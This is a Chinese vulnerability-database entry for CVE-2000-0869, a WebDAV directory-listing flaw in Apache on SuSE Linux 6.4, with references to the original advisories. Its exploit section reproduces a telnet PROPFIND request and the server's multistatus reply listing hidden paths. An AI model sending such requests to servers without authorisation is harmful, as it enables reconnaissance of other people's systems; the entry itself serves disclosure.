SuSE Linux Apache WebDAV目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105992 漏洞类型 未知
发布时间 2000-09-07 更新时间 2006-08-03
CVE编号 CVE-2000-0869 CNNVD-ID CNNVD-200011-048
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20210
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-048
|漏洞详情
SuSELinux6.4的Apache1.3.12默认配置启用WebDAV,远程攻击者可以利用该漏洞借助PROPFINDHTTP请求方法列出任意目录。
|漏洞EXP
source: http://www.securityfocus.com/bid/1656/info

WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP which allows users to create, edit and share documents using the HTTP protocol. A particular REQUEST METHOD, PROPFIND, allows users to retrieve resource properties such as displayname, date last modified, and others. Apache web server as installed by SuSE 6.4 has WebDAV enabled for the entire file structure of the server. By making a specific, properly structured request to the Apache web server, it is possible to obtain information which is equivalent to a directory listing.

suse~: # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
PROPFIND / HTTP/1.1
Host: suse
Content-Type: text/xml
Content-Length: 110

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:">
<a:prop>
<a:displayname/>
</a:prop>
</a:propfind>

HTTP/1.1 207 Multi-Status
Date: Sun, 20 Aug 2000 17:38:58 GMT
Server: Apache/1.3.12 (Unix) (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14
mod_perl/1.21 PHP/3.0.15
Transfer-Encoding: chunked
Content-Type: text/xml; charset="utf-8"

dc1
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/secret/secret/sql_tool.shtml</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/change-passwd.shtml</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/add-user.shmtl</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webalizer/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/test.php3</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/date.php3</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/linbot/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/robots.txt</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/index.html</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/gif/u_arrow.gif</D:href>
<D:propstat>
<D:prop>
</D:prop>
..
- ---cut-----
|参考资料

来源:BID
名称:1656
链接:http://www.securityfocus.com/bid/1656
来源:ATSTAKE
名称:A090700-3
链接:http://www.atstake.com/research/advisories/2000/a090700-3.txt
来源:SUSE
名称:20000907
链接:http://archives.neohapsis.com/archives/linux/suse/2000-q3/0906.html
来源:XF
名称:apache-webdav-directory-listings
链接:http://xforce.iss.net/static/5204.php